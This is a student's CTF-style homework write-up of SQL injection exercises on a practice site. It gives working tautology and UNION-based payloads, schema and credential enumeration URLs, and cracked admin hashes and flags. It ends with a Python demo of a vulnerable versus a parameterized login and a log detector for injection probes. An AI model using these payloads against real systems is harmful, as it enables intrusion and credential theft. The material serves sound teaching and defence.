---
title: 0517-Red-Team-SQL-Inj # slide deck title
tags: 0517-Red-Team-SQL-Inj, SQL-Inj # slide deck tags
slideOptions:
  # spotlight:
  #   enabled: true
---

{%hackmd theme-dark %}

# 0517-Red-Team-SQL-Inj HW

### Jeff

### [SQL injection practice site](http://1ion.tw/demo/)

### Exercise 1: /demo_sqli_1/

- [x] Done

* Payload

```
username: 'OR 1=1 --
```

* FLAG:

:::success
flag{eaSy_sq1i_0oO1}
:::

![](https://i.imgur.com/JRJOiJX.jpg)

### Exercise 2: /demo_sqli_2/

- [x] Done

(1) Determine how many columns there are (needed for UNION)

* Payload

```sql
id=1 order by 4
```

![](https://i.imgur.com/53ISGWK.jpg)

* The error only appears at `order by 4`
* Conclusion: three columns in total

(2) Determine the database type (checking in turn whether it is MySQL, Oracle or SQLite)

* Payload

```sql
id=1 union select 1,sqlite_version(),2
```

* Result: SQLite => 3.22.0

![](https://i.imgur.com/tjoqG2S.jpg)

(3) Enumerate tables:

* Payload

```sql
id=1 union SELECT 1,2,name FROM sqlite_master WHERE type='table'
```

![](https://i.imgur.com/TP4qvdV.jpg)

* Result: three tables => member, news, sqlite_sequence

(4) Enumerate the schema

* Payload

```sql
id=1 union SELECT 1,2,sql FROM sqlite_master WHERE type='table'
```

![](https://i.imgur.com/TBPjAWN.jpg)

(5) Retrieve the column data

* Payload

```sql
id=1 union select id, username, password from member
```

![](https://i.imgur.com/NiL8uA1.jpg)

* FLAG:

:::success
flag{eaSy_sq2InHect1on_0222222}
:::

### Exercise 3: /demo_sqli_3/

- [x] Done

* Source code review:
  * ![](https://i.imgur.com/ZzvmnB2.png)
  * The first value of the row must === 'admin'
  * password === the second value of the row
  * Why does a string work as the column input?

![](https://i.imgur.com/Sy9XAtq.png)

* Payload

```
username: ' union select "admin", "omgomg" --'
password: omgomg
```

![](https://i.imgur.com/o272us5.jpg)

* FLAG:

:::success
flag{CeaSy_sq1i2_ds85nS}
:::

* TODO:
  - [ ] Crack admin's password

### Exercise 4: /demo_sqli_4/

- [x] Done

* Notes:
  * Sometimes the URL has to be URL-encoded before the site reacts at all
  * An error does not necessarily show up as an SQL error; in this exercise it is a page redirect

1. Determine the number of columns, using `id=2 order by 4`
   * Payload

   ```
   http://1ion.tw/demo/demo_sqli_4/page.php?id=2%20order%20by%204%23%27
   ```

   * At `order by 4` the error redirect happens
   * With the Hackbar tools: `id=2'+ORDER+BY+4` -> remember the single quote
   * Different comment syntax gives different results (always URL-encode the payload)
     * `id = 2' order by 4 --'` => fails
     * `id = 2' order by 4 #'` => works
     * `id = 2 order by 4 #'` => works
   * [Resources](https://mariadb.com/kb/en/comment-syntax/)

2. Check the database version
   * Both of the following payloads work

   ```
   http://1ion.tw/demo/demo_sqli_4/page.php?id=5' union select 1,version(),3 --'
   http://1ion.tw/demo/demo_sqli_4/page.php?id=5' union select 1,version(),3 #'
   ```

   * Payload (URL-encoded), either of the above

   ```
   http://1ion.tw/demo/demo_sqli_4/page.php?id=5%27%20union%20select%201%2Cversion%28%29%2C3%20--%27
   ```

   * Common MariaDB functions
     * [Query the schema](https://mariadb.com/kb/en/information-functions/)
     * [List schemas (databases)](https://dataedo.com/kb/query/mariadb/list-schemas-in-database)

3. Enumerate schemas (databases), method 1
   * Payload

   ```
   http://1ion.tw/demo/demo_sqli_4/page.php?id=5%27%20union%20select%201%2CSCHEMA%28%29%2Cuser%28%29%20%23%27
   ```

   ![](https://i.imgur.com/T5EHICQ.jpg)

   * Database name obtained => demo4
   * Enumerate the user
     * Payload

     ```
     http://1ion.tw/demo/demo_sqli_4/page.php?id=5' union select 1,row_count(),user() #'
     ```

     * Payload (URL-encoded)

     ```
     http://1ion.tw/demo/demo_sqli_4/page.php?id=5%27%20union%20select%201%2Crow_count%28%29%2Cuser%28%29%20%23%27
     ```

     ![](https://i.imgur.com/rjYlsbu.jpg)

     * The user is also called demo4
     * ROW_COUNT turns out to be 0
   * Enumerate schemas (databases), method 2
     * Payload

     ```
     id=5' union select 1,schema_name,3 from information_schema.schemata limit 1,1 #'
     ```

     * `limit` is required; only then is anything displayed
     * The offset can be adjusted
     * Payload (URL-encoded)

     ```
     http://1ion.tw/demo/demo_sqli_4/page.php?id=5%27%20union%20select%201%2Cschema_name%2C3%20from%20information_schema.schemata%20limit%201,1%20%23%27
     ```

     ![](https://i.imgur.com/lkZoxhI.jpg)

4. Enumerate tables
   * [Information Schema COLUMNS Table](https://mariadb.com/kb/en/information-schema-columns-table/)
   * Payload

   ```
   id=5' union select 1,table_name,3 from information_schema.columns limit 1,1 #'
   ```

   * Payload (URL-encoded)

   ```
   http://1ion.tw/demo/demo_sqli_4/page.php?id=5%27%20union%20select%201%2Ctable_name%2C3%20from%20information_schema.columns%20limit%201,1%20%23%27
   ```

   ![](https://i.imgur.com/GXlM1Gu.jpg)

   * Every table listed in information_schema.columns can be enumerated this way
     * limit 0,1 => news
     * limit 1,1 => users
     * limit 2,1 => APPLICABLE_ROLES
     * limit 3,1 => CHARACTER_SETS
     * ......

   ![](https://i.imgur.com/5iFv7WR.jpg)
   ![](https://i.imgur.com/AuZJ988.jpg)

5. Enumerate columns
   * Get `id`
     * Payload

     ```
     id=5' union select 1,column_name,3 from information_schema.columns where table_name="users" limit 0,1 #'
     ```

     * Payload (URL-encoded)

     ```
     http://1ion.tw/demo/demo_sqli_4/page.php?id=5%27%20union%20select%201%2Ccolumn_name%2C3%20from%20information_schema.columns%20where%20table_name%3D%22users%22%20limit%200%2C1%20%23%27
     ```

     ![](https://i.imgur.com/s67D7Ca.jpg)
   * Get `username`
     * Payload

     ```
     id=5' union select 1,column_name,3 from information_schema.columns where table_name="users" limit 1,1 #'
     ```

     * Payload (URL-encoded)

     ```
     http://1ion.tw/demo/demo_sqli_4/page.php?id=5%27%20union%20select%201%2Ccolumn_name%2C3%20from%20information_schema.columns%20where%20table_name%3D%22users%22%20limit%201%2C1%20%23%27
     ```

     ![](https://i.imgur.com/vLZMLxD.jpg)
   * Get `password`
     * Payload

     ```
     id=5' union select 1,column_name,3 from information_schema.columns where table_name="users" limit 2,1 #'
     ```

     * Payload (URL-encoded)

     ```
     http://1ion.tw/demo/demo_sqli_4/page.php?id=5%27%20union%20select%201%2Ccolumn_name%2C3%20from%20information_schema.columns%20where%20table_name%3D%22users%22%20limit%202%2C1%20%23%27
     ```

     ![](https://i.imgur.com/L4WagjH.jpg)

6. Exploit!
   * Fetch the data
     * Payload

     ```
     id=5' union select id,username,password from users limit 0,1 #'
     ```

     * Payload (URL-encoded)

     ```
     http://1ion.tw/demo/demo_sqli_4/page.php?id=5%27%20union%20select%20id%2Cusername%2Cpassword%20from%20users%20limit%200%2C1%20%23%27
     ```

     ![](https://i.imgur.com/Y5yCOwd.jpg)

     * username: admin
     * password: 098f7fe7bc33cab697d08bbb771e9c6e642f53f3
     * sha1 => a145621

     ![](https://i.imgur.com/MEqgjkk.jpg)

:::success
FLAG: flag{sQl1_lS_eaS1_r1ght}
:::

![](https://i.imgur.com/TLrBZD2.jpg)

### Exercise 5: /demo_sqli_5/

- [ ] Done

### Exercise 6: /demo_sqli_6_err/

- [x] Done

1. Determine the number of fields
   * Payload

   ```
   http://1ion.tw/demo/demo_sqli_6_err/page.php?id=1 order by 9
   ```

   ![](https://i.imgur.com/pEV5sUD.jpg)

   * The result is an error
   * Conclusion: only 8 columns

2. Determine the database type
   * Payload

   ```
   http://1ion.tw/demo/demo_sqli_6_err/page.php?id=5 union select 1,2,version(),4,5,6,7,8
   ```

   ![](https://i.imgur.com/SSxRi4S.jpg)

   * Both `version()` and `@@version` work
   * `sqlite_version()` does not
   * Conclusion: MariaDB, version 10.1.44

3. Enumerate databases => database name: demo6

   ```
   http://1ion.tw/demo/demo_sqli_6_err/page.php?id=5 union select 1,2,schema_name,4,5,6,7,8 from information_schema.schemata
   ```

   ![](https://i.imgur.com/ons2NLf.jpg)

4. Enumerate tables

   ```
   http://1ion.tw/demo/demo_sqli_6_err/page.php?id=5 union select 1,table_name,table_schema,4,5,6,7,8 from information_schema.TABLES
   ```

   ![](https://i.imgur.com/5jRiXuP.jpg)

5. Enumerate columns
   * Get the `id` column:

   ```
   http://1ion.tw/demo/demo_sqli_6_err/page.php?id=5 union select 1,2,column_name,4,5,6,7,8 from information_schema.columns where table_name="members"
   ```

   ![](https://i.imgur.com/1G8R1kN.jpg)

   * Get the `user` column

   ```
   http://1ion.tw/demo/demo_sqli_6_err/page.php?id=5 union select 1,2,column_name,4,5,6,7,8 from information_schema.columns where table_name="members" limit 1,1 --
   ```

   ![](https://i.imgur.com/GTrXbM9.jpg)

   * Get the `pass` column

   ```
   http://1ion.tw/demo/demo_sqli_6_err/page.php?id=5 union select 1,2,column_name,4,5,6,7,8 from information_schema.columns where table_name="members" limit 2,1 --
   ```

   ![](https://i.imgur.com/itq8ZLC.jpg)

6. Enumerate the credentials

   ```
   http://1ion.tw/demo/demo_sqli_6_err/page.php?id=5 union select 1,user,pass,4,5,6,7,8 from members
   ```

   ![](https://i.imgur.com/zesIxPd.jpg)

   * admin
   * f379eaf3c831b04de153469d1bec345e, which cracks to => 666666

   ![](https://i.imgur.com/38qVRKm.jpg)

7. Log in and take the FLAG

:::success
flag{sQl1_666666666666}
:::

![](https://i.imgur.com/MLGALCV.jpg)

### Reflection: exercises 1 and 6 are the same type of problem

* The difference: a different database is used => the syntax required differs too, which highlights the importance of identifying the database first (knowing which database it is before going in makes the work much more efficient)
* Handy syntax for identifying the database

![](https://i.imgur.com/3mOjz5B.jpg)
![](https://i.imgur.com/wR22wGW.jpg)

* Source: the slides provided by Eason
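Looking back at exercises 1 and 3: the `' OR 1=1 --` tautology is enough when the application only asks "did a row come back?", but exercise 3 compares the returned row against `'admin'` and the submitted password in application code, which is why a UNION that fabricates the whole row was needed. The double-quoted `"admin"` in that payload works because SQLite treats a double-quoted name that resolves to no column as a string literal (its "double-quoted string" fallback), which answers the question raised under exercise 3. The following is an added example, not code from the write-up or from the practice site: it rebuilds the exercise 3 login against a constructed in-memory SQLite table (modelled on the `member` table from exercise 2) and puts the concatenated query beside a parameterized one. The payload is written with single quotes so it does not depend on the SQLite fallback; the sample rows, table layout and function names are assumptions for this demo.

```python
import hmac
import sqlite3

# Constructed sample data modelled on the 'member' table seen in exercise 2.
# Passwords are kept in plaintext here only so the vulnerable and the fixed
# login behave identically for a legitimate user; real storage should be a
# salted slow hash (the MD5/SHA-1 values dumped in exercises 4 and 6 show why).
SAMPLE_ROWS = [("admin", "demo-admin-pw"), ("guest", "guest")]

# The two payloads from the write-up (exercise 3's rewritten with single quotes).
TAUTOLOGY_PAYLOAD = "'OR 1=1 -- "                      # exercise 1
UNION_PAYLOAD = "' union select 'admin','omgomg' --"   # exercise 3


def make_db():
    """In-memory SQLite database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE member (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO member (username, password) VALUES (?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def build_concat_sql(username):
    """The query shape from exercise 3's source: input pasted into the SQL string."""
    return f"SELECT username, password FROM member WHERE username = '{username}'"


def login_concat(conn, username, password):
    """Deliberately vulnerable login (exercise 3 style)."""
    row = conn.execute(build_concat_sql(username)).fetchone()
    # The write-up's two checks. They stop the exercise 1 tautology (a real row
    # comes back and its stored password does not match), but once a UNION
    # supplies the row, both compared values are attacker-chosen.
    return row is not None and row[0] == "admin" and row[1] == password


def login_parameterized(conn, username, password):
    """Fixed login: a bound parameter, so quotes, UNION and comment markers are
    just characters of a username that does not exist."""
    row = conn.execute(
        "SELECT username, password FROM member WHERE username = ?", (username,)
    ).fetchone()
    # Constant-time comparison for the application-side check.
    return row is not None and hmac.compare_digest(row[1].encode(), password.encode())


def run_cases():
    """Run both logins against a legitimate user and against both payloads."""
    conn = make_db()
    cases = {
        "legit": ("admin", "demo-admin-pw"),
        "tautology": (TAUTOLOGY_PAYLOAD, "anything"),
        "union": (UNION_PAYLOAD, "omgomg"),
    }
    results = {}
    for name, (user, pw) in cases.items():
        results["concat/" + name] = login_concat(conn, user, pw)
        results["param/" + name] = login_parameterized(conn, user, pw)
    return results


if __name__ == "__main__":
    for case, ok in run_cases().items():
        print(f"{case:18s} -> {'authenticated' if ok else 'rejected'}")
```

Running it shows the concatenated login accepting the UNION payload with password `omgomg` while rejecting the tautology, and the parameterized login accepting only the real credentials; `build_concat_sql` can be printed to see exactly how the trailing quote ends up behind the `--`.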
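On the defensive side, every probe in this write-up (ORDER BY column counting, UNION SELECT, reads of `information_schema` or `sqlite_master`, version functions, and the `--` / `#` terminators) leaves a recognisable trail in the web server access log. The following is an added example, not part of the write-up: a small detector that decodes the logged query string and scores it against patterns derived from those probes. The log lines are constructed (the encoded queries are the ones used in exercises 2 and 4), and the indicator weights and threshold are assumptions. Decoding matters because, as the notes for exercise 4 observe, a literal `#` never reaches the server; it only arrives as `%23`, so the match has to run on the decoded string.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines (Apache combined format). Lines 2-5 carry the
# URL-encoded probes from exercises 2 and 4; lines 1, 6 and 7 are benign.
SAMPLE_LOG = [
    '203.0.113.5 - - [17/May/2020:10:00:01 +0800] "GET /demo/demo_sqli_4/page.php?id=2 HTTP/1.1" 200 812',
    '203.0.113.5 - - [17/May/2020:10:00:07 +0800] "GET /demo/demo_sqli_4/page.php?id=2%20order%20by%204%23%27 HTTP/1.1" 302 0',
    '203.0.113.5 - - [17/May/2020:10:00:19 +0800] "GET /demo/demo_sqli_4/page.php?id=5%27%20union%20select%201%2Cversion%28%29%2C3%20--%27 HTTP/1.1" 200 901',
    '203.0.113.5 - - [17/May/2020:10:00:33 +0800] "GET /demo/demo_sqli_4/page.php?id=5%27%20union%20select%201%2Cschema_name%2C3%20from%20information_schema.schemata%20limit%201,1%20%23%27 HTTP/1.1" 200 903',
    '203.0.113.5 - - [17/May/2020:10:01:02 +0800] "GET /demo/demo_sqli_2/?id=1+union+select+1%2Csqlite_version%28%29%2C2 HTTP/1.1" 200 655',
    '198.51.100.9 - - [17/May/2020:10:01:40 +0800] "GET /search?q=union+station+select+hotels HTTP/1.1" 200 4410',
    '198.51.100.9 - - [17/May/2020:10:01:55 +0800] "GET /docs?slug=pre--post HTTP/1.1" 200 2210',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

# (name, weight, pattern), applied to the decoded, lower-cased query string.
# Weights are an assumption: a lone comment marker is too weak on its own.
INDICATORS = [
    ("column-count probe", 2, re.compile(r"\border\s+by\s+\d+")),
    ("union injection", 2, re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("schema enumeration", 2, re.compile(r"information_schema\.\w+|\bsqlite_master\b")),
    ("db fingerprint", 2, re.compile(r"version\s*\(|@@version|\bschema\s*\(|\buser\s*\(")),
    ("comment marker", 1, re.compile(r"--|#")),
]
THRESHOLD = 2


def analyze_line(line, line_no=0):
    """Decode one request's query string and score it; None if no request found."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group(1))
    # Decode exactly what the server received ('+' and %XX, including %23),
    # then lowercase so keyword case games do not matter.
    decoded = unquote_plus(parts.query).lower()
    indicators = [name for name, _, rx in INDICATORS if rx.search(decoded)]
    score = sum(w for name, w, _ in INDICATORS if name in indicators)
    return {
        "line_no": line_no,
        "path": parts.path,
        "query": decoded,
        "indicators": indicators,
        "score": score,
    }


def scan(lines):
    """Return the analysed entries whose score reaches the threshold."""
    hits = []
    for i, line in enumerate(lines, start=1):
        result = analyze_line(line, i)
        if result and result["score"] >= THRESHOLD:
            hits.append(result)
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"line {hit['line_no']}: score {hit['score']} {hit['indicators']}")
        print(f"    {hit['path']}?{hit['query']}")
```

The benign search for "union station select hotels" scores zero because the UNION rule requires `select` to follow `union` directly, and `pre--post` scores only one, below the threshold; the four probe lines are flagged with the specific stages they correspond to, which is also a useful way to reconstruct how far an attacker got from a log alone.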